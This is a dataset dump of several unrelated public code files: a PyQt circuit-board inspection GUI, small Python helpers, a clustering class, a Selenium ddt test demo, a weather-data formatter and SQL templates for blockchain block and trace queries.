defect_img_widget.setLayout(defect_img_layout)\n\n # [jk] add\n camera_img_layout.setContentsMargins(0,0,0,0)\n camera_img_layout.addWidget(camera_temp_label, 2)\n camera_img_layout.addWidget(self.camera_img_label, 9)\n camera_img_layout.addLayout(camera_show_button_hbox, 1)\n camera_img_widget.setLayout(camera_img_layout)\n # [jk] add\n\n\n self.stackedWidget.addWidget(main_widget)\n self.stackedWidget.addWidget(defect_img_widget)\n\n # [jk] add\n 
self.stackedWidget.addWidget(camera_img_widget)\n\n layout = QVBoxLayout(self)\n layout.addWidget(self.stackedWidget)\n self.setLayout(layout)\n self.stackedWidget.setCurrentIndex(0)\n self.inspection_flag = False\n self.playlist = QMediaPlaylist()\n \n self.media_player = QMediaPlayer()\n self.inspection_stop_btn.setEnabled(False)\n self.sqldatabase = SQLDatabase()\n if PRODUCT_FLAG:\n self.sqldatabase.check_post_data()\n \n self.boardDefectDetect = BoardDefectDetect(bad_img_label, self.workorder, self.workorder_item, self.defect_img_label, self.stackedWidget)\n \n self.today_inspection = self.sqldatabase.check_today_table(self.get_inspection_json(), self.workorder.get_current_text())\n self.ui_value_change(self.today_inspection, True)\n self.boardDefectDetect.init_value_change(self.today_inspection)\n self.boardDefectDetect.today_inspection_change(self.today_inspection)\n self.boardDefectDetect.sound_data.connect(self.detect_defect)\n #[jk]\n self.boardDefectDetect.camera_view_connect.connect(self.camera_view_event)\n self.boardDefectDetect.stacked_widget.connect(self.stacked_widget_check)\n self.boardDefectDetect.update_data.connect(self.update_data)\n self.boardDefectDetect.update_board_count.connect(self.change_inspection_start_btn)\n def change_inspection_start_btn(self, board_count):\n self.inspection_start_btn.setText(f\"작업중..{board_count}\")\n def get_inspection_json(self):\n #115 : 쇼트, 116: 리드미삽, 143:냉땜\n inspection_json = {\n \"workorder_item_id\": self.workorder_item.get_workorder_id(), \n \"inspection_date\": self.inspection_date.get_label(), \n \"start_date\":self.inspection_start_time.text(),\n \"end_date\":self.inspection_stop_time.text(),\n \"inspector_name\":self.inspector_name.get_current_text(),\n \"workorder_quantity\":change_text(self.workorder_quantity.get_label()),\n \"inspection_quantity\":self.boardDefectDetect.total_board_count,\n \"inspection_percent\":0 if self.workorder_quantity.get_label() == '0' else int((self.boardDefectDetect.total_board_count/change_text(self.workorder_quantity.get_label()))*100),\n \"bad_quantity\":self.boardDefectDetect.defect_count,\n \n \"bad_type\":[{\"143\": self.boardDefectDetect.defect_type_count[0], \"116\": self.boardDefectDetect.defect_type_count[1], \"115\":self.boardDefectDetect.defect_type_count[2]}],\n \"normal_quantity\":self.boardDefectDetect.total_board_count-self.boardDefectDetect.defect_count, \n }\n return inspection_json\n def ui_value_change(self, data, is_today):\n if is_today :\n self.inspection_start_time.setText(str(data[1]))\n self.inspection_date.change_label(str(data[5]))\n self.workorder_quantity.change_label(change_number(data[7]))\n\n self.inspection_quantity.change_label(change_number(data[8]))\n self.inspection_percent.change_label(str(data[9])+\"%\")\n self.bad_quantity.change_label(change_number(data[10]))\n self.normal_quantity.change_label(change_number(data[12]))\n self.inspector_name.change_item(self.inspector_name.get_index_text(data[6]))\n self.workorder.change_item(self.workorder.get_index_text(data[13]))\n self.workorder_item.change_item(self.workorder_item.get_index_text(data[4], \"id\"))\n\n def update_data(self,board_count, defect_count, defect_type_label) :\n \n self.inspection_quantity.change_label(change_number(board_count))\n self.inspection_percent.change_label(f\"{0 if self.workorder_quantity.get_label() == '0' else int((board_count/change_text(self.workorder_quantity.get_label()))*100)}%\")\n self.bad_quantity.change_label(change_number(defect_count))\n 
self.bad_type.change_label(f\"{defect_type_label}\")\n self.normal_quantity.change_label(change_number(board_count-defect_count))\n self.sqldatabase.update_table(self.get_inspection_json(), self.today_inspection[0], self.workorder.get_current_text())\n self.stacked_widget_check()\n # [jk] add\n def camera_view_event(self, im):\n img = QImage(im, im.shape[1], im.shape[0], im.strides[0], QImage.Format_BGR888)\n self.camera_img_label.setPixmap(QPixmap.fromImage(img).scaled(1296, 972, Qt.IgnoreAspectRatio))\n def on_camera_button(self):\n\n self.stackedWidget.setCurrentIndex(0)\n self.boardDefectDetect.stop_camera()\n def on_camera_view(self):\n\n self.stackedWidget.setCurrentIndex(2)\n self.boardDefectDetect.start()\n # [jk] add\n def stacked_widget_check(self):\n # [jk] add\n\n if self.boardDefectDetect.defect_show_list:\n \n self.defect_img_label.setPixmap(self.boardDefectDetect.defect_show_list[0])\n self.stackedWidget.setCurrentIndex(1)\n\n # else:\n # self.stackedWidget.setCurrentIndex(0)\n\n def detect_defect(self, defect):\n self.playlist.clear()\n\n for file_path in defect:\n \n self.playlist.addMedia(QMediaContent(QUrl.fromLocalFile(os.path.join(\"/opt/MVS/Samples/64/Python/GrabImage/mjai/sounds\",SOUND_LIST[file_path]))))\n self.media_player.setPlaylist(self.playlist)\n self.media_player.play()\n\n def init_json(self):\n self.inspection_stop_time.setText(\"\")\n self.inspection_quantity.change_label(\"0\")\n self.inspection_percent.change_label(\"0%\")\n self.bad_quantity.change_label(\"0\")\n self.bad_type.change_label(\"\")\n self.normal_quantity.change_label(\"0\")\n \n self.boardDefectDetect.defect_flag = False\n self.boardDefectDetect.defect_type_flag = [False,False,False,False,False,False]\n self.boardDefectDetect.defect_board_flag = [False,False,False,False,False,False]\n self.boardDefectDetect.defect_count_list = [0,0,0,0,0,0]\n self.boardDefectDetect.defect_alarm = False\n self.boardDefectDetect.total_board_count = 0 \n self.boardDefectDetect.defect_count = 0 \n self.boardDefectDetect.defect_type_label = \"\"\n self.boardDefectDetect.board_flag = False\n self.boardDefectDetect.defect_type_count = [0,0,0]\n self.boardDefectDetect.defect_show_flag = False\n def create_table(self):\n self.sqldatabase.insert_table(self.get_inspection_json(), self.workorder.get_current_text())\n result = self.sqldatabase.select_today_table()\n self.today_inspection = result[len(result)-1]\n self.boardDefectDetect.today_inspection_change(self.today_inspection)\n def clicked_button(self, button, is_start, commit = None):\n\n if button.text() == \"네\":\n commit_data = self.boardDefectDetect.sqldatabase.select_commit_table(self.workorder_item.get_workorder_id(),self.workorder.get_current_text())\n print(commit_data)\n \n if commit_data :\n self.start_start_message_box(commit_data[0])\n else :\n if not self.boardDefectDetect.get_working():\n if self.boardDefectDetect.is_post == True:\n self.init_json()\n self.inspection_start_time.setText(get_datetime())\n self.create_table()\n else:\n\n if self.boardDefectDetect.today_inspection[1]=='':\n self.inspection_start_time.setText(get_datetime())\n self.boardDefectDetect.start()\n self.inspection_start_btn.setText(\"검사중..\")\n self.camera_view_button.setEnabled(False)\n self.inspection_start_btn.setEnabled(False)\n self.inspection_stop_btn.setEnabled(True)\n #self.start_start_message_box()\n elif button.text() == \"확인\":\n if not self.boardDefectDetect.get_working():\n self.boardDefectDetect.sqldatabase.update_commit_table(commit[0])\n 
self.ui_value_change(commit, False)\n self.boardDefectDetect.init_value_change(commit)\n if self.boardDefectDetect.today_inspection[1]=='':\n self.inspection_start_time.setText(get_datetime())\n self.boardDefectDetect.start()\n self.inspection_start_btn.setText(\"검사중..\")\n self.camera_view_button.setEnabled(False)\n self.inspection_start_btn.setEnabled(False)\n self.inspection_stop_btn.setEnabled(True)\n elif button.text() == \"새로 시작\":\n if not self.boardDefectDetect.get_working():\n self.boardDefectDetect.sqldatabase.update_commit_table(commit[0])\n \n if self.boardDefectDetect.today_inspection[1]=='':\n self.inspection_start_time.setText(get_datetime())\n self.boardDefectDetect.start()\n self.inspection_start_btn.setText(\"검사중..\")\n self.camera_view_button.setEnabled(False)\n self.inspection_start_btn.setEnabled(False)\n self.inspection_stop_btn.setEnabled(True)\n elif button.text() == \"종료\":\n self.stop_stop_message_box()\n \n elif button.text() == \"일시정지\":\n if self.boardDefectDetect.get_working():\n\n self.boardDefectDetect.stop(self.get_inspection_json(),False)\n self.inspection_start_btn.setText(\"검사 시작\")\n self.camera_view_button.setEnabled(True)\n self.inspection_start_btn.setEnabled(True)\n self.inspection_stop_btn.setEnabled(False)\n elif button.text() == \"완료\":\n if self.boardDefectDetect.get_working():\n self.inspection_stop_time.setText(get_datetime())\n self.boardDefectDetect.stop(self.get_inspection_json(),True, self.inspection_stop_time.text(),True)\n self.inspection_start_btn.setText(\"검사 시작\")\n self.camera_view_button.setEnabled(True)\n self.inspection_start_btn.setEnabled(True)\n self.inspection_stop_btn.setEnabled(False)\n elif button.text() == \"저장\":\n if self.boardDefectDetect.get_working():\n self.inspection_stop_time.setText(get_datetime())\n self.boardDefectDetect.stop(self.get_inspection_json(),True, self.inspection_stop_time.text(),False)\n self.inspection_start_btn.setText(\"검사 시작\")\n self.camera_view_button.setEnabled(True)\n self.inspection_start_btn.setEnabled(True)\n self.inspection_stop_btn.setEnabled(False)\n def start_message_box(self):\n msgBox = QMessageBox()\n \n msgBox.setText(\"선택한 항목으로 검사를 시작하겠습니까?\")\n msgBox.setStyleSheet(\"font-size: 28px;\")\n msgBox.setWindowTitle(\"Start\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n\n msgBox.setMinimumSize(500, 500)\n \n yes_button = msgBox.button(QMessageBox.No)\n yes_button.setText(\"네\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, True))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.Yes)\n no_button.setText(\"아니오\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, True))\n no_button.setContentsMargins(100,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n \n msgBox.exec_()\n def start_start_message_box(self, commit_data):\n msgBox = QMessageBox()\n \n msgBox.setText(f'{commit_data[5]} 날짜로 해당 작지 품목의 이전 검사가 남아있습니다. 
이어서 진행하시겠습니까?')\n msgBox.setStyleSheet(\"font-size: 28px;\")\n msgBox.setWindowTitle(\"Start\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n\n msgBox.setMinimumSize(500, 500)\n \n yes_button = msgBox.button(QMessageBox.No)\n yes_button.setText(\"확인\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, True, commit_data))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.Yes)\n no_button.setText(\"새로 시작\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, True, commit_data))\n no_button.setContentsMargins(100,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n msgBox.exec_()\n def stop_stop_message_box(self):\n msgBox = QMessageBox()\n msgBox.setText(\"해당 작업품목의 검사 진행을 완료하였으면 '완료'를, 검사가 남아있는 경우 '저장'을 눌러주세요. \")\n msgBox.setStyleSheet(\"font-size: 28px;\")\n # stop_text = \"
해당 보드의 검사를 끝내길 원하시면 '종료'를, 검사가 남아있는 경우 '저장'을 눌러주세요.
\"\n # msgBox.setText(stop_text)\n\n msgBox.setWindowTitle(\"Stop\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)\n\n msgBox.setMinimumSize(500, 500)\n\n yes_button = msgBox.button(QMessageBox.Cancel)\n yes_button.setText(\"완료\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, False))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.No)\n no_button.setText(\"저장\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, False))\n no_button.setContentsMargins(0,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n\n cancel_button = msgBox.button(QMessageBox.Yes)\n cancel_button.setText(\"취소\")\n cancel_button.setIcon(QIcon())\n cancel_button.clicked.connect(lambda: self.clicked_button(cancel_button, False))\n cancel_button.setContentsMargins(0,20,0,0)\n cancel_button.setStyleSheet(\"font-size: 24px;\")\n cancel_button.setFixedSize(120,50)\n msgBox.exec_()\n def stop_message_box(self):\n msgBox = QMessageBox()\n stop_text = \"
검사를 종료하시겠습니까?\n\n* 검사 종료 후 검사 결과는 MES 서버로 전송됩니다.
\"\n msgBox.setText(stop_text)\n\n msgBox.setWindowTitle(\"Stop\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)\n\n msgBox.setMinimumSize(500, 500)\n\n yes_button = msgBox.button(QMessageBox.Cancel)\n yes_button.setText(\"종료\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, False))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.No)\n no_button.setText(\"일시정지\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, False))\n no_button.setContentsMargins(0,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n\n cancel_button = msgBox.button(QMessageBox.Yes)\n cancel_button.setText(\"취소\")\n cancel_button.setIcon(QIcon())\n cancel_button.clicked.connect(lambda: self.clicked_button(cancel_button, False))\n cancel_button.setContentsMargins(0,20,0,0)\n cancel_button.setStyleSheet(\"font-size: 24px;\")\n cancel_button.setFixedSize(120,50)\n msgBox.exec_()\n\n def close_message_box(self):\n msgBox = QMessageBox()\n msgBox.setText(\"검사 진행중입니다.\\n 프로그램 종료를 원하시면 검사 종료 버튼을 눌러주세요.\")\n msgBox.setStyleSheet(\"font-size: 28px;\")\n msgBox.setWindowTitle(\"Close\")\n msgBox.setStandardButtons(QMessageBox.Yes)\n\n msgBox.setMinimumSize(500, 500)\n\n yes_button = msgBox.button(QMessageBox.Yes)\n yes_button.setText(\"네\")\n yes_button.setIcon(QIcon())\n \n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n \n msgBox.exec_()\n def on_inspection_start(self):\n self.start_message_box()\n\n def on_inspection_stop(self):\n self.stop_message_box()\n \n def closeEvent(self, event):\n if self.boardDefectDetect.get_working():\n self.close_message_box()\n event.ignore()\n else:\n self.boardDefectDetect.sqldatabase.close_db()\n event.accept()\n\n def on_defect_show(self):\n # self.stackedWidget.setCurrentIndex(0)\n self.boardDefectDetect.del_defect_show_list()\n if self.boardDefectDetect.defect_show_list:\n\n self.defect_img_label.setPixmap(self.boardDefectDetect.defect_show_list[0])\n else:\n self.stackedWidget.setCurrentIndex(0)\n def keyPressEvent(self,event):\n if event.key() == Qt.Key_B:\n self.boardDefectDetect.del_defect_show_list()\n if self.boardDefectDetect.defect_show_list:\n\n self.defect_img_label.setPixmap(self.boardDefectDetect.defect_show_list[0])\n else:\n self.stackedWidget.setCurrentIndex(0)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n win = Main()\n win.show()\n sys.exit(app.exec_())\n","repo_name":"dtriple-team/mjai","sub_path":"mj_qt_main.py","file_name":"mj_qt_main.py","file_ext":"py","file_size_in_byte":27068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21670111708","text":"from os import path\nfrom typing import TextIO, Dict, AnyStr, Any\nfrom collections.abc import Sequence\n\nfrom tabulate import tabulate\n\n\ndef format_print(output):\n if isinstance(output, str):\n print(output)\n elif isinstance(output, Sequence) and isinstance(output[1], dict):\n headers = list(map(str, output[0].keys()))\n data = [list(map(str, x.values())) for x in output]\n print(tabulate(data, headers=headers))\n elif isinstance(output, dict) and len(output.keys()) == 1:\n k = list(output.keys())[0]\n print('{0}:'.format(k))\n for k, v in iter(output[k].items()):\n 
print('\\t{0}: {1}'.format(k, v))\n print('\\n')\n else:\n print('Object not matched in format_print')\n print(str(output))\n\nclass safe_open:\n def __init__(self, fpath):\n self.fpath: str = fpath\n self.f: TextIO = None\n def __enter__(self):\n dir = path.dirname(self.fpath)\n if not path.exists(dir):\n path.mkdir(dir)\n self.f = open(self.fpath, 'x')\n return self.f\n def __exit__(self, type, value, traceback):\n self.f.close()\n","repo_name":"RyanJarv/orgmanager","sub_path":"orgmanager/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16303911320","text":"import numpy as np\nfrom uids.utils.Logger import Logger as log\nfrom abc import abstractmethod\nfrom sklearn.metrics.pairwise import *\nfrom uids.v2.set_metrics import ABOD\n\n\nclass ClusterBase:\n\n __valid_similarity_metrics = {\n 'ABOD',\n 'euclidean_to_mean', # samples to set_mean < thresh\n 'cosine_to_mean', # samples to set_mean < thresh\n 'euclidean_mean', # average distance to set < thresh\n 'cosine_mean' # average distance to set < thresh\n }\n\n # ========= internal representation\n data = np.array([])\n\n def __init__(self):\n pass\n\n def get_data(self):\n return self.data\n\n @abstractmethod\n def update(self, samples):\n \"\"\"\n Specifies how to update self.data with incomming samples\n \"\"\"\n raise NotImplementedError(\"Implement Cluster Update.\")\n\n def cluster_type(self):\n \"\"\"\n Return the name of the cluster type\n e.g. return \"HullCluster\"\n \"\"\"\n return self.__class__.__name__\n\n # ------------------ set similarity metrics\n\n def set_similarity_score(self, samples, metric):\n \"\"\"\n Calculate a single set similarity score\n :param samples:\n :param metric:\n :return:\n \"\"\"\n raise ValueError('Not implemented yet!')\n\n def sample_set_similarity_scores(self, samples, metric):\n \"\"\"\n Calculate a sample wise set similarity score\n :param samples:\n :param metric:\n :return:\n \"\"\"\n\n if len(self.data) == 0:\n raise ValueError(\"Classifier has not been fitted yet. Use 'partial_fit(samples)' first!\")\n\n # calculate sample-wise to-set similarity\n if metric == 'ABOD':\n # needs at least 3 points\n if len(self.data) < 3:\n raise ValueError(\"ABOD calculation needs at least 3 fitted samples!\")\n return ABOD.get_score(samples, reference_set=self.data)\n elif metric == 'euclidean_to_mean':\n return self.class_mean_dist(samples, metric='euclidean')\n elif metric == 'cosine_to_mean':\n return self.class_mean_dist(samples, metric='cosine')\n elif metric == 'euclidean_mean':\n return self.mean_dist(samples, metric='euclidean')\n elif metric == 'cosine_mean':\n return self.mean_dist(samples, metric='cosine')\n else:\n raise ValueError(\"Invalid metric. 
Select from: {}\".format(self.__valid_similarity_metrics))\n\n # ------------------ general metrics\n\n def mean_dist(self, samples, metric='cosine'):\n \"\"\"\n :param samples: test samples\n :param metric: distance metric\n :return: Average distance between class and sample data\n \"\"\"\n dist = np.mean(pairwise_distances(samples, self.data, metric=metric), axis=1)\n if metric == 'euclidean':\n dist = np.square(dist)\n return dist\n\n def class_mean_dist(self, samples, metric='cosine'):\n \"\"\"\n :param samples: test samples\n :param metric: distance metric\n :return: Distance to class mean for every sample\n \"\"\"\n class_mean = np.mean(self.data, axis=0)\n dist = pairwise_distances(class_mean.reshape(1, -1), samples, metric=metric)[0]\n if metric == 'euclidean':\n dist = np.square(dist)\n return dist\n\n def mean(self):\n if len(self.data) > 0:\n return np.mean(self.data, axis=0).reshape(1, -1)\n else:\n return None\n","repo_name":"alialavia/UserIdentification","sub_path":"uids/uids/data_models/ClusterBase.py","file_name":"ClusterBase.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"41815809442","text":"\"\"\"\nExercise 9.1. Write a program that reads words.txt and prints only the words with more than 20\ncharacters (not counting whitespace).\n\"\"\"\n\nfp=open('E:\\projects\\practice-python\\interviews\\/thinkpython\\words.txt','r')\nfor line in fp.readlines():\n if len(str(line)) > 20:\n print(line)\nfp.close()\n","repo_name":"samperay/pycodes","sub_path":"pybooks/thinkpython/ex9.1.py","file_name":"ex9.1.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"70093895553","text":"'''\n UnitTest中的ddt数据驱动应用\n 环境部署:\n pip install ddt\n ddt模块所有的内容都是基于装饰器的形态来实现补充的。\n 一定要在调用ddt的类中声明ddt的调用,也就是在class前面加入@ddt\n 在需要调用数据驱动的用例前,调用@data,实现数据的驱动分离\n file_data用于处理yaml格式的文件\n yaml格式的数据驱动管理时一个yaml对应一条用例\n'''\nimport unittest\nfrom ddt import ddt, file_data, data, unpack\nfrom python_test.excel.excel_driver.web_keys import WebKeys\n\n\ndef read_file():\n li = []\n file = open('data/1.txt', 'r', encoding='utf-8')\n for line in file.readlines():\n li.append(line)\n file.close()\n return li\n\n\n@ddt # 声明该class将要调用ddt模块进行数据管理\nclass UnitDemo(unittest.TestCase):\n def setUp(self) -> None:\n self.wk = WebKeys('Edge')\n\n def tearDown(self) -> None:\n self.wk.quit()\n\n '''\n data执行的操作就是拆包\n @data('111','222','333')\n 将所有数据进行分割:\n 111\n 222\n 333\n 基于拆分出来的结果总数,定义循环次数,每次循环都传入一个参数进去\n 当需要传入多个参数的时候,所以需要二次解包\n '''\n\n # @data('python', 'mandy')\n # # data传入数据,多个参数传入元组,或者数列,或者字典,unpack解包元组按顺序传入\n # def test_01(self, text):\n # self.wk.visit('http://www.baidu.com')\n # self.wk.input('id', 'kw', text)\n # self.wk.click('id', 'su')\n # self.wk.sleep(3)\n #\n # @data(('python', 'su'), ('java', 'su'))\n # @unpack\n # # data传入数据,多个参数传入元组,或者数列,或者字典,unpack解包元组按顺序传入\n # def test_02(self, text, ttt):\n # self.wk.visit('http://www.baidu.com')\n # self.wk.input('id', 'kw', text)\n # self.wk.click('id', ttt)\n # self.wk.sleep(3)\n #\n # 基于文件的内容度,实现数据驱动\n # @data(*read_file())\n # def test_02(self, name):\n # print(name)\n #\n #\n @file_data('./data/test_data.yaml')\n def test_03(self, **kwargs):\n self.wk.visit(kwargs['url'])\n self.wk.input(**kwargs['input'])\n self.wk.click(**kwargs['click'])\n self.wk.sleep(3)\n\n\n\n\nif __name__ == '__main__':\n 
unittest.main\n","repo_name":"ttt01007/Python","sub_path":"python_02_selenium/class12_ddt_yaml/unit_demo_copy.py","file_name":"unit_demo_copy.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15530046738","text":"import datetime\nfrom concurrent import futures\nfrom typing import Any\nfrom datetime import datetime\nimport requests\nfrom PyQt5.QtGui import QPixmap\n\n\nclass FormatDataHelper:\n\n @staticmethod\n def extract_coord(data: dict) -> Any:\n \"\"\"\n This method extracts the coordinates of the city the client is searching information about.\n :param data: A dict of the data to be filtered.\n :return: The method returns a dict of the longitude and latitude\n \"\"\"\n try:\n coordinates = data[\"coord\"]\n return coordinates\n except Exception as exception:\n print(\"[FormatDataHelper] - extract_coord method error traceback : {}\".format(exception))\n return None\n\n @staticmethod\n def format_time(unix_time: int) -> Any:\n \"\"\"\n This method converts the unix timestamp into a readable date.\n :param unix_time: The number of seconds that have elapsed since the Unix epoch\n :return: The method returns a string of the current date\n \"\"\"\n try:\n time = datetime.fromtimestamp(unix_time).strftime('%H:%M:%S ~ %d-%m-%Y')\n return time\n except Exception as exception:\n print(\"[FormatDataHelper] - format_time method error traceback : {}\".format(exception))\n return None\n\n @staticmethod\n def format_temp(temp: int) -> str:\n \"\"\"\n This method formats the given value to celsius format\n :param temp: A int value of the temperature.\n :return: A string representation of the temperature with celsius format.\n \"\"\"\n return str(round(temp)) + \"°C\"\n\n @staticmethod\n def format_proc(temp: int) -> str:\n \"\"\"\n This method formats the value to a percentage format.\n :param temp: A int value to be formatted.\n :return: A string representation of the value with percentage format.\n \"\"\"\n return str(round(temp)) + \"%\"\n\n @staticmethod\n def get_image(url: str):\n \"\"\"\n This method fetches a single image from url. This method is blocking.\n :param url: A string containing a url.\n :return: A QPixmap object.\n \"\"\"\n response = requests.get(url)\n if response.status_code == 200:\n image_data = response.content\n pixmap = QPixmap()\n pixmap.loadFromData(image_data)\n return pixmap\n return None\n\n @staticmethod\n def get_images(urls: list) -> list:\n \"\"\"\n This method fetches from the given urls list the images as QPixmap. 
It is build to be asynchronous.\n :param urls: A list of urls to be fetched.\n :return: A list of QPixmap objects.\n \"\"\"\n with futures.ThreadPoolExecutor(max_workers=10) as e:\n fs = [\n e.submit(lambda: requests.get(url)) for url in urls\n ]\n results = [\n f.result() for f in fs\n ]\n\n def build_pixmap(response):\n if response.status_code == 200:\n image_data = response.content\n pixmap = QPixmap()\n pixmap.loadFromData(image_data)\n return pixmap\n return list(map(lambda x: build_pixmap(x), results))\n\n @staticmethod\n def filter_data(data: dict) -> Any:\n \"\"\"\n This method extracts from the main dictionary the main data used in the app.\n :param data: A dict of the data to be filtered.\n :return: The method returns a dict of the relevant data.\n \"\"\"\n try:\n filtered_data: dict = {\"timezone\": data[\"timezone\"], \"timezone_offset\": data[\"timezone_offset\"],\n \"current\": data[\"current\"], \"daily\": [], \"hourly\": [], \"lat\": data[\"lat\"],\n \"lon\": data[\"lon\"], \"city\": data[\"city\"] if \"city\" in data.keys() else None}\n\n hourly: list = data[\"hourly\"]\n daily: list = data[\"daily\"]\n\n # Extract data for current representation\n filtered_data[\"current\"][\"time\"] = FormatDataHelper.format_time(filtered_data[\"current\"][\"dt\"])\n filtered_data[\"current\"][\"humidity\"] = FormatDataHelper.format_proc(filtered_data[\"current\"][\"humidity\"])\n filtered_data[\"current\"][\"clouds\"] = FormatDataHelper.format_proc(filtered_data[\"current\"][\"clouds\"])\n filtered_data[\"current\"][\"pressure\"] = str(filtered_data[\"current\"][\"pressure\"]) + \"hPa\"\n filtered_data[\"current\"][\"visibility\"] = str(filtered_data[\"current\"][\"visibility\"] / 1000) + \"km\"\n filtered_data[\"current\"][\"wind_speed\"] = str(round(filtered_data[\"current\"][\"wind_speed\"], 1)) + \"m/s\"\n filtered_data[\"current\"][\"feels_like\"] = FormatDataHelper.format_temp(\n filtered_data[\"current\"][\"feels_like\"])\n filtered_data[\"current\"][\"weather\"][0][\"icon\"] = \"http://openweathermap.org/img/wn/{}.png\" \\\n .format(filtered_data[\"current\"][\"weather\"][0][\"icon\"])\n filtered_data[\"current\"].pop(\"dt\", None)\n\n # Extract data for hourly representation\n for item in hourly[:10]:\n tmp_time = FormatDataHelper.format_time(item[\"dt\"])\n tmp_icon_uri = \"http://openweathermap.org/img/wn/{}.png\".format(item[\"weather\"][0][\"icon\"])\n tmp_temperature = item[\"temp\"]\n tmp_description = item[\"weather\"][0][\"main\"]\n\n item = {\n \"time\": tmp_time,\n \"icon\": tmp_icon_uri,\n \"temperature\": round(tmp_temperature),\n \"description\": tmp_description\n }\n\n # Append json object to new list\n filtered_data[\"hourly\"].append(item)\n\n # Extract data for daily representation\n for daily_item in daily[:3]:\n tmp_min_temp = daily_item[\"temp\"][\"min\"]\n tmp_max_temp = daily_item[\"temp\"][\"max\"]\n tmp_icon_uri = \"http://openweathermap.org/img/wn/{}.png\".format(daily_item[\"weather\"][0][\"icon\"])\n tmp_time = FormatDataHelper.format_time(daily_item[\"dt\"])\n tmp_description = daily_item[\"weather\"][0][\"main\"]\n\n daily_item = {\n \"time\": tmp_time,\n \"icon\": tmp_icon_uri,\n \"min_temp\": round(tmp_min_temp),\n \"max_temp\": round(tmp_max_temp),\n \"description\": tmp_description\n }\n\n # Append json object to new list\n filtered_data[\"daily\"].append(daily_item)\n return filtered_data\n except Exception as exception:\n print(\"[FormatDataHelper] - filter_data method error traceback : {}\".format(exception))\n return 
None\n","repo_name":"sgabriel190/weather-desktop-app","sub_path":"app/DataHelper.py","file_name":"DataHelper.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12149209093","text":"from jinja2 import Template\n\nREAD_BLOCK_TEMPLATE = Template(\n \"\"\"\nSELECT\n min(block_timestamp) AS min_st,\n max(block_timestamp) AS max_st,\n sum(tx_count) AS block_txs\nFROM (\n SELECT DISTINCT\n block_timestamp, blknum, tx_count\n FROM\n \"{{chain}}\".blocks\n WHERE\n blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n) _\n \"\"\"\n)\n\nREAD_TRACE_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address,\n (CASE status WHEN 1 THEN round(value) ELSE 0 END)::text AS value,\n trace_address, status\nFROM\n \"{{chain}}\".traces\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND trace_type <> 'reward' -- use block_rewards instead\n AND (call_type is null OR call_type NOT IN ('callcode', 'staticcall', 'delegatecall'))\n AND from_address is not null\n AND to_address is not null\n AND trace_address <> '[]'\n\nUNION ALL\n\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address,\n COALESCE(to_address, receipt_contract_address) AS to_address,\n round(CASE receipt_status WHEN null THEN value WHEN 1 THEN value ELSE 0 END)::text AS value,\n '[]'::text AS trace_address, receipt_status AS status\nFROM\n \"{{chain}}\".txs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND from_address is not null\n\"\"\"\n)\n\nREAD_TX_AS_TRACE_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, 